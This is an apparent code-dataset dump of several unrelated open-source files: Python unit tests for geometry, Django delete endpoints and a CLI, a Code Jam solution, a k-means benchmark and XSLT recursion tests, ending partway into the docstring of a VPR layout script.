| max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
|---|---|---|---|---|---|---|
FEM/src/test/StatisticsTest.py
|
BartSiwek/Neurotransmitter2D
| 0
|
12780051
|
<filename>FEM/src/test/StatisticsTest.py<gh_stars>0
import unittest, math
import Pslg, ElementAwarePslg
import Statistics
class ParametersTest(unittest.TestCase):
def testComputeElementAngleRange(self):
#Angle of zero
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,0)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.0 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 45 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.25 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 45 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(1,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.25 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 90 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(0,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.5 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 90 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(0,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.5 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 135 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.75 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 135 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,-1)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 0.75 * math.pi
self.assertAlmostEqual(angle, expected, 9)
#Angle of 180 degrees
a = Pslg.GridPoint(0,0)
b = Pslg.GridPoint(-1,0)
c = Pslg.GridPoint(1,0)
angle = Statistics.ComputeAngleBetweenPoints(a, b, c)
expected = 1.0 * math.pi
self.assertAlmostEqual(angle, expected, 9)
if __name__ == '__main__':
unittest.main()
| 2.984375
| 3
|
Round 1B/fair-fight2.py
|
enigma-pattern/GoogleCodeJam-2019
| 54
|
12780052
|
# Copyright (c) 2019 kamyu. All rights reserved.
#
# Google Code Jam 2019 Round 1B - Problem C. Fair Fight
# https://codingcompetitions.withgoogle.com/codejam/round/0000000000051706/0000000000122838
#
# Time: O(NlogN); passes in PyPy2 but not in Python2
# Space: O(NlogN)
#
import collections
import itertools
class RangeQuery(object):
def __init__(self, items, fn):
self.__fn = fn
self.__pow = [1]
self.__bit_length = [0]
n, count = len(items), 1
for i in xrange(1, n.bit_length()+1):
self.__pow.append(self.__pow[-1] * 2)
self.__bit_length.extend([i]*min(count, n+1-len(self.__bit_length)))
count *= 2
self.__rq = rq = [[0 for _ in xrange(n.bit_length())] for _ in xrange(n)]
for i in xrange(n):
self.__rq[i][0] = items[i]
for step in xrange(1, n.bit_length()): # Time: O(NlogN)
for i in xrange(n+1-self.__pow[step]):
self.__rq[i][step] = fn(self.__rq[i][step-1],
self.__rq[i+self.__pow[step-1]][step-1])
def query(self, start, stop): # Time: O(1)
j = self.__bit_length[stop-start]-1
x = self.__rq[start][j]
y = self.__rq[stop-self.__pow[j]][j]
return self.__fn(x, y)
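# Illustrative usage of the sparse table above (values chosen only for demonstration):
# rmq = RangeQuery([3, 1, 4, 1, 5], max)
# rmq.query(1, 4) # -> 4, the max over items[1:4]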
def lower_bound(left, right, check):
while left <= right:
mid = left + (right-left)//2
if check(mid):
right = mid-1
else:
left = mid+1
return left
def upper_bound(left, right, check):
while left <= right:
mid = left + (right-left)//2
if not check(mid):
right = mid-1
else:
left = mid+1
return left # assert(right == left-1)
def fair_fight():
N, K = map(int, raw_input().strip().split())
C = map(int, raw_input().strip().split())
D = map(int, raw_input().strip().split())
C_RMQ, D_RMQ = RangeQuery(C, max), RangeQuery(D, max)
result, next_to_last_seen = 0, collections.defaultdict(int)
for i, (Ci, Di) in enumerate(itertools.izip(C, D)):
if Di-Ci > K: # skip impossible intervals to save time
continue
L_good = lower_bound(next_to_last_seen[Ci], i,
lambda x: C_RMQ.query(x, i+1) == Ci and D_RMQ.query(x, i+1)-Ci <= K)
R_good = upper_bound(i, N-1,
lambda x: C_RMQ.query(i, x+1) == Ci and D_RMQ.query(i, x+1)-Ci <= K)-1
L_bad = lower_bound(next_to_last_seen[Ci], i,
lambda x: C_RMQ.query(x, i+1) == Ci and D_RMQ.query(x, i+1)-Ci <= -K-1)
R_bad = upper_bound(i, N-1,
lambda x: C_RMQ.query(i, x+1) == Ci and D_RMQ.query(i, x+1)-Ci <= -K-1)-1
result += (i-L_good+1)*(R_good-i+1)-(i-L_bad+1)*(R_bad-i+1)
next_to_last_seen[Ci] = i+1 # to avoid duplicated count
return result
for case in xrange(input()):
print 'Case #%d: %s' % (case+1, fair_fight())
| 2.59375
| 3
|
kmeans/performance.py
|
numberoverzero/kmeans
| 21
|
12780053
|
"""
Utils for generating random data and comparing performance
"""
import os
import time
import pickle
import random
from kmeans import kmeans, here
here = here(__file__)
try:
range = xrange
except NameError:
pass
def timer():
start = time.clock()
return lambda: time.clock() - start
def random_points(n):
"""Returns n random [(x_1, x_2, x_3), w] tuples.
Constraints:
0 <= abs(x_N) <= 1<<8
0 <= w <= 100
x_N, w are non-negative integers
"""
rx = lambda: random.randrange(0, 1 << 8)
rw = lambda: random.randrange(1, 10)
point = lambda: [(rx(), rx(), rx()), rw()]
filename = os.path.join(here, "_perf.sample")
try:
with open(filename, 'rb') as f:
points = pickle.load(f)
except:
points = []
diff = n - len(points)
if diff > 0:
print("Cache was missing {} points".format(diff))
t = timer()
points.extend(point() for _ in range(diff))
with open(filename, 'wb') as f:
pickle.dump(points, f)
elapsed = t()
print("Added {} points to the cache ({}s)".format(diff, elapsed))
return ListProxy(points)
class ListProxy(list):
"""Fake sizes by setting length"""
def __init__(self, data):
super().__init__(data)
self.max_length = len(data)
self.length = self.max_length
@property
def length(self):
return self._length
@length.setter
def length(self, n):
if n > self.max_length:
raise ValueError(
"Maximum possible length is " + str(self.max_length))
self._length = n
def __len__(self):
return self.length
def __iter__(self):
for i in range(self.length):
yield self[i]
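# Illustrative usage of ListProxy (hypothetical point objects p0..p4):
# proxy = ListProxy([p0, p1, p2, p3, p4])
# proxy.length = 2
# len(proxy) # -> 2
# list(proxy) # -> [p0, p1]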
def main():
samples = [
# ~ Common "large" image sizes
(1920 * 1200, 3),
(1920 * 1200, 5),
(1920 * 1200, 15),
# Personal benchmarks
(747116, 5), # Unique pixels in 1920 x 1080 image
(1095169, 5), # Unique pixels in 15530 x 8591 image
# Max unique pixels in rgb 256 image
(16581375, 5)
]
max_sample = max(sample[0] for sample in samples)
print("Generating {} random points".format(max_sample))
t = timer()
points = random_points(max_sample)
elapsed = t()
print("Random points generated ({}s)".format(elapsed))
def run_test(n, k):
points.length = n
t = timer()
kmeans(points, k)
elapsed = t()
return elapsed
for n, k in samples:
print("Running test: {} points, {} centers".format(n, k))
elapsed = run_test(n, k)
print("N {:9} || K {:3} || E {}".format(n, k, elapsed))
if __name__ == "__main__":
main()
| 3.15625
| 3
|
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/dn_20020325.py
|
aleasims/Peach
| 0
|
12780054
|
# Examples from the article "Two-stage recursive algorithms in XSLT"
# By <NAME> and <NAME>
# http://www.topxml.com/xsl/articles/recurse/
from Xml.Xslt import test_harness
BOOKS = """ <book>
<title>Angela's Ashes</title>
<author><NAME></author>
<publisher>HarperCollins</publisher>
<isbn>0 00 649840 X</isbn>
<price>6.99</price>
<sales>235</sales>
</book>
<book>
<title>Sword of Honour</title>
<author><NAME></author>
<publisher>Penguin Books</publisher>
<isbn>0 14 018967 X</isbn>
<price>12.99</price>
<sales>12</sales>
</book>"""
BOOKLIST_XML = """<?xml version="1.0" encoding="utf-8"?>
<booklist>
%s
</booklist>"""
BOOKS_TOTAL = 6.99 * 235 + 12.99 * 12
# total-sales/simple.xsl
sheet_1 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="/*/book"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="sumSales1">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:choose>
<xsl:when test="$pNodes">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes[position()!=1]"/>
<xsl:with-param name="result" select="$result+$pNodes[1]/sales*$pNodes[1]/price"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:value-of select="$result"/>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# total-sales/dvc.xsl
sheet_2 = """<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="/*/book"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="sumSales">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:variable name="vcntNodes" select="count($pNodes)"/>
<xsl:choose>
<xsl:when test="$vcntNodes = 1">
<xsl:value-of select="$result + $pNodes/sales * $pNodes/price"/>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="vcntHalf" select="floor($vcntNodes div 2)"/>
<xsl:variable name="vValue1">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() <= $vcntHalf]"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:variable>
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() > $vcntHalf]"/>
<xsl:with-param name="result" select="$vValue1"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# total-sales/two-stage.xsl
# (with $t param added so threshold can be adjusted)
#
# The threshold is the # of elements above which DVC will be used,
# and below which recursion will be used.
#
sheet_3="""<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:param name="t" select="20"/>
<xsl:template match="/">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="/*/book"/>
<xsl:with-param name="threshold" select="$t"/>
</xsl:call-template>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="sumSales">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="threshold" select="10"/>
<xsl:param name="result" select="0"/>
<xsl:variable name="vcntNodes" select="count($pNodes)"/>
<xsl:choose>
<xsl:when test="$vcntNodes <= $threshold">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="vcntHalf" select="floor($vcntNodes div 2)"/>
<xsl:variable name="vValue1">
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() <= $vcntHalf]"/>
<xsl:with-param name="threshold" select="$threshold"/>
<xsl:with-param name="result" select="$result"/>
</xsl:call-template>
</xsl:variable>
<xsl:call-template name="sumSales">
<xsl:with-param name="pNodes" select="$pNodes[position() > $vcntHalf]"/>
<xsl:with-param name="threshold" select="$threshold"/>
<xsl:with-param name="result" select="$vValue1"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="sumSales1">
<xsl:param name="pNodes" select="/.."/>
<xsl:param name="result" select="0"/>
<xsl:choose>
<xsl:when test="$pNodes">
<xsl:call-template name="sumSales1">
<xsl:with-param name="pNodes" select="$pNodes[position()!=1]"/>
<xsl:with-param name="result" select="$result+$pNodes[1]/sales*$pNodes[1]/price"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise><xsl:value-of select="$result"/></xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
DIGITS = "0123456789"
DIGITS_XML = """<?xml version="1.0" encoding="utf-8"?>
<text>%s</text>"""
REVERSED_DIGITS = "9876543210"
# reverse/lrReverse.xsl
sheet_4 = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:template match="/">
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="/*/text()"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="reverse2">
<xsl:param name="theString"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength = 1">
<xsl:value-of select="$theString"/>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="length1" select="floor($thisLength div 2)"/>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString,$length1+1, $thisLength - $length1)"/>
</xsl:call-template>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString, 1, $length1)"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
# reverse/lrReverse2.xsl
# (with $t param added so threshold can be adjusted)
#
# The threshold is the # of chars above which DVC will be used,
# and below which recursion will be used.
#
sheet_5 = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/>
<xsl:param name="t" select="75"/>
<xsl:template match="/">
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="threshold" select="$t"/>
</xsl:call-template>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="reverse2">
<xsl:param name="theString"/>
<xsl:param name="threshold" select="30"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength <= $threshold">
<xsl:call-template name="reverse">
<xsl:with-param name="theString" select="$theString"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="length1" select="floor($thisLength div 2)"/>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString,$length1+1, $thisLength - $length1)"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
<xsl:call-template name="reverse2">
<xsl:with-param name="theString" select="substring($theString, 1, $length1)"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="reverse">
<xsl:param name="theString"/>
<xsl:variable name="thisLength" select="string-length($theString)"/>
<xsl:choose>
<xsl:when test="$thisLength = 1">
<xsl:value-of select="$theString"/>
</xsl:when>
<xsl:otherwise>
<xsl:value-of select="substring($theString,$thisLength,1)"/>
<xsl:call-template name="reverse">
<xsl:with-param name="theString" select="substring($theString, 1, $thisLength -1)"/>
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
GOBBLEDY = "dfd dh AAAsrter xcbxb AAAA gghmjk gfghjk ghAAAkghk dgsdfgAAA sdsdg AAA sdsdfg\n"
GOBBLEDY_XML = """<?xml version="1.0" encoding="utf-8"?>
<text>%s</text>"""
GOBBLEDY_OUT = GOBBLEDY.replace('AAA','ZZZ')
sheet_6="""<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common">
<xsl:output method="text" encoding="iso-8859-1" />
<xsl:template match="/">
<xsl:variable name="Result">
<xsl:call-template name="lrReplace">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="target" select="'AAA'" />
<xsl:with-param name="replacement" select="'ZZZ'" />
</xsl:call-template>
</xsl:variable>
<xsl:value-of select="$Result" />
</xsl:template>
<xsl:template name="lrReplace">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="resRTF">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="resNode-set" select="exsl:node-set($resRTF)"/>
<xsl:value-of select="$resNode-set/text()"/>
<xsl:value-of select="substring($theString, $lStr - $resNode-set/u+1)" />
</xsl:template>
<xsl:template name="lrReplace2">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement" select="''" />
<xsl:variable name="lStr" select="string-length($theString)" />
<xsl:variable name="lTarget" select="string-length($target)" />
<xsl:choose>
<xsl:when test="$lStr < $lTarget + $lTarget">
<xsl:choose>
<xsl:when
test="contains($theString,$target)">
<xsl:value-of select="substring-before($theString,$target)" />
<xsl:value-of select="$replacement" />
<u>
<xsl:value-of select="string-length(substring-after($theString,$target))" />
</u>
</xsl:when>
<xsl:otherwise>
<xsl:choose>
<xsl:when test="$lStr >= $lTarget">
<xsl:value-of select="substring($theString, 1, $lStr - $lTarget + 1)"/>
<u>
<xsl:value-of select="$lTarget - 1" />
</u>
</xsl:when>
<xsl:otherwise>
<u>
<xsl:value-of select="$lStr" />
</u>
</xsl:otherwise>
</xsl:choose>
</xsl:otherwise>
</xsl:choose>
</xsl:when>
<!-- Now the general case - theString is not less than twice the replacement -->
<xsl:otherwise>
<xsl:variable name="halfLength" select="floor($lStr div 2)"/>
<xsl:variable name="processedHalf">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, 1, $halfLength)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="nodePrHalf" select="exsl:node-set($processedHalf)"/>
<xsl:value-of select="$nodePrHalf/text()"/>
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString"
select="substring($theString, $halfLength - $nodePrHalf/u + 1)" />
<xsl:with-param name="target" select="$target" />
<xsl:with-param name="replacement" select="$replacement" />
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
sheet_7="""<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:exsl="http://exslt.org/common">
<xsl:output method="text" encoding="iso-8859-1" />
<xsl:template match="/">
<xsl:variable name="Result">
<xsl:call-template name="lrReplace">
<xsl:with-param name="theString" select="/*/text()"/>
<xsl:with-param name="target" select="'AAA'"/>
<xsl:with-param name="replacement" select="'ZZZ'"/>
<xsl:with-param name="threshold" select="2000"/>
</xsl:call-template>
</xsl:variable>
<xsl:value-of select="$Result" />
</xsl:template>
<xsl:template name="lrReplace">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:param name="threshold" select="150"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="resRTF">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="resNode-set" select="exsl:node-set($resRTF)"/>
<xsl:value-of select="$resNode-set/text()"/>
<xsl:value-of select="substring($theString, $lStr - $resNode-set/u+1)"/>
</xsl:template>
<!-- DVC template: -->
<xsl:template name="lrReplace2">
<xsl:param name="theString"/>
<xsl:param name="target"/>
<xsl:param name="replacement"/>
<xsl:param name="threshold" select="150"/>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="lTarget" select="string-length($target)"/>
<xsl:choose>
<xsl:when test="$lStr <= $threshold">
<xsl:call-template name="lrReplace3">
<xsl:with-param name="theString" select="$theString"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="halfLength" select="floor($lStr div 2)"/>
<xsl:variable name="processedHalf">
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, 1, $halfLength)" />
<xsl:with-param name="target" select="$target" />
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold"/>
</xsl:call-template>
</xsl:variable>
<xsl:variable name="nodePrHalf" select="exsl:node-set($processedHalf)"/>
<xsl:value-of select="$nodePrHalf/text()"/>
<xsl:call-template name="lrReplace2">
<xsl:with-param name="theString" select="substring($theString, $halfLength - $nodePrHalf/u + 1)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
<xsl:with-param name="threshold" select="$threshold" />
</xsl:call-template>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
<!-- simple recursive template: -->
<xsl:template name="lrReplace3">
<xsl:param name="theString" />
<xsl:param name="target" />
<xsl:param name="replacement" />
<xsl:choose>
<xsl:when test="contains($theString, $target)">
<xsl:value-of select="substring-before($theString, $target)"/>
<xsl:value-of select="$replacement"/>
<xsl:call-template name="lrReplace3">
<xsl:with-param name="theString" select="substring-after($theString, $target)"/>
<xsl:with-param name="target" select="$target"/>
<xsl:with-param name="replacement" select="$replacement"/>
</xsl:call-template>
</xsl:when>
<xsl:otherwise>
<xsl:variable name="lStr" select="string-length($theString)"/>
<xsl:variable name="lTarget" select="string-length($target)"/>
<xsl:choose>
<xsl:when test="$lStr >= $lTarget">
<xsl:value-of select="substring($theString, 1, $lStr -$lTarget+1)" />
<u>
<xsl:value-of select="$lTarget -1"/>
</u>
</xsl:when>
<xsl:otherwise>
<u>
<xsl:value-of select="$lStr"/>
</u>
</xsl:otherwise>
</xsl:choose>
</xsl:otherwise>
</xsl:choose>
</xsl:template>
</xsl:stylesheet>"""
def Test(tester):
# how many repetitions of BOOKS for the shortest source doc
MULTIPLIER = 10
# how many binary orders of magnitude to go up to
EXPLIMIT = 1
sheet = test_harness.FileInfo(string=sheet_1)
for i in range(EXPLIMIT):
elements = (2 * MULTIPLIER) * 2 ** i
title = "simple recursion with %d element" % elements + "s" * (elements > 0)
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_2)
for i in range(EXPLIMIT):
elements = (2 * MULTIPLIER) * 2 ** i
title = "divide and conquer with %d element" % elements + "s" * (elements > 0)
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_3)
for i in range(EXPLIMIT):
threshold = 8 # seems to be best as of 2003-03-23
elements = (2 * MULTIPLIER) * 2 ** i
title = "2-stage divide and conquer with %d element" % elements + "s" * (elements > 0)
title += " (threshold=%d)" % threshold
source_xml = BOOKLIST_XML % ((BOOKS * MULTIPLIER) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = str((BOOKS_TOTAL * MULTIPLIER) * 2 ** i)
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title,
topLevelParams={'t': threshold})
sheet = test_harness.FileInfo(string=sheet_4)
for i in range(EXPLIMIT):
chars = 1000 * 2 ** i
title = "divide and conquer reversal of %d-char string" % chars
source_xml = DIGITS_XML % ((DIGITS * 100) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (REVERSED_DIGITS * 100) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_5)
for i in range(EXPLIMIT):
threshold = 75
chars = 1000 * 2 ** i
title = "2-stage divide and conquer reversal of %d-char string" % chars
title += " (threshold=%d)" % threshold
source_xml = DIGITS_XML % ((DIGITS * 100) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (REVERSED_DIGITS * 100) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title,
topLevelParams={'t': threshold})
sheet = test_harness.FileInfo(string=sheet_6)
for i in range(EXPLIMIT):
chars = (len(GOBBLEDY) * 20) * 2 ** i
title = "divide and conquer search/replace on %d-char string" % chars
source_xml = GOBBLEDY_XML % ((GOBBLEDY * 20) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (GOBBLEDY_OUT * 20) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
sheet = test_harness.FileInfo(string=sheet_7)
for i in range(EXPLIMIT):
chars = (len(GOBBLEDY) * 20) * 2 ** i
title = "2-stage divide and conquer search/replace on %d-char string" % chars
source_xml = GOBBLEDY_XML % ((GOBBLEDY * 20) * 2 ** i)
source_1 = test_harness.FileInfo(string=source_xml)
expected_1 = (GOBBLEDY_OUT * 20) * 2 ** i
test_harness.XsltTest(tester, source_1, [sheet], expected_1,
title=title)
return
| 3.453125
| 3
|
tests/test_soft_and_hard_deletes.py
|
Bilonan/django-binder
| 14
|
12780055
|
<reponame>Bilonan/django-binder
from django.test import TestCase, Client
from django.contrib.auth.models import User
from binder.json import jsonloads
from .testapp.models import Animal, Costume, Caretaker
class DeleteTest(TestCase):
def setUp(self):
super().setUp()
u = User(username='testuser', is_active=True, is_superuser=True)
u.set_password('<PASSWORD>')
u.save()
self.client = Client()
r = self.client.login(username='testuser', password='<PASSWORD>')
self.assertTrue(r)
def test_non_soft_deletable_model_is_hard_deleted_on_delete_verb(self):
donald = Animal(name='Donald Duck')
donald.save()
sailor = Costume(description='Weird sailor costume', animal=donald)
sailor.save()
response = self.client.delete('/costume/%d/' % sailor.pk)
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
self.assertFalse(Costume.objects.exists())
def test_soft_deletable_model_is_softdeleted_on_delete_verb(self):
donald = Animal(name='Donald Duck')
donald.save()
self.assertFalse(donald.deleted)
response = self.client.delete('/animal/%d/' % donald.id)
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
donald.refresh_from_db()
self.assertTrue(donald.deleted)
def test_soft_deletable_model_is_undeleted_on_post(self):
donald = Animal(name='Donald Duck', deleted=True)
donald.save()
self.assertTrue(donald.deleted)
# Body must be empty, otherwise we get an error
response = self.client.post('/animal/%d/' % donald.id, data='{"name": "<NAME>"}', content_type='application/json')
self.assertEqual(response.status_code, 418)
response = self.client.post('/animal/%d/' % donald.id, data='{}', content_type='application/json')
self.assertEqual(response.status_code, 204)
self.assertEqual('', response.content.decode())
donald.refresh_from_db()
self.assertFalse(donald.deleted)
def test_hard_deletable_model_raises_validation_error_on_cascaded_delete_failure(self):
walt = Caretaker(name='<NAME>')
walt.save()
donald = Animal(name='<NAME>', caretaker=walt)
donald.save()
# Body must be empty, otherwise we get another error
response = self.client.delete('/caretaker/%d/' % walt.id)
self.assertEqual(response.status_code, 400)
returned_data = jsonloads(response.content)
self.assertEqual(returned_data['code'], 'ValidationError')
self.assertEqual(len(returned_data['errors']), 1)
self.assertEqual(len(returned_data['errors']['caretaker']), 1)
self.assertEqual(len(returned_data['errors']['caretaker'][str(walt.id)]), 1)
self.assertEqual(len(returned_data['errors']['caretaker'][str(walt.id)]['id']), 1)
self.assertEqual(returned_data['errors']['caretaker'][str(walt.id)]['id'][0]['code'], 'protected')
self.assertIn('message', returned_data['errors']['caretaker'][str(walt.id)]['id'][0])
self.assertIn('objects', returned_data['errors']['caretaker'][str(walt.id)]['id'][0])
self.assertEqual({'animal': [donald.id]}, returned_data['errors']['caretaker'][str(walt.id)]['id'][0]['objects'])
walt.refresh_from_db() # Should not fail
donald.refresh_from_db()
self.assertFalse(donald.deleted)
| 2.28125
| 2
|
pyluna-pathology/tests/luna/pathology/cli/test_infer_tile_labels.py
|
msk-mind/luna
| 1
|
12780056
|
from click.testing import CliRunner
from luna.pathology.cli.infer_tile_labels import cli
def test_cli(tmp_path):
runner = CliRunner()
result = runner.invoke(cli, [
'pyluna-pathology/tests/luna/pathology/cli/testdata/data/test/slides/123/test_generate_tile_ov_labels/TileImages/data/',
'-o', tmp_path,
'-rn', 'msk-mind/luna-ml',
'-tn', 'tissue_tile_net_transform',
'-mn', 'tissue_tile_net_model_5_class',
'-wt', 'main:tissue_net_2021-01-19_21.05.24-e17.pth',
])
# No longer errors gracefully -- the test can be updated with proper data and it will pass
assert result.exit_code == 1
| 2
| 2
|
utils/symbiflow/scripts/flatten_layout.py
|
QuickLogic-Corp/qlfpga-symbiflow-plugins
| 0
|
12780057
|
<gh_stars>0
#!/usr/bin/env python3
"""
This script loads VPR architecture definition and flattens all layouts defined
there so that they only consist of <single> tags. Tiles of the flattened
layouts can have individual metadata (FASM prefixes) assigned.
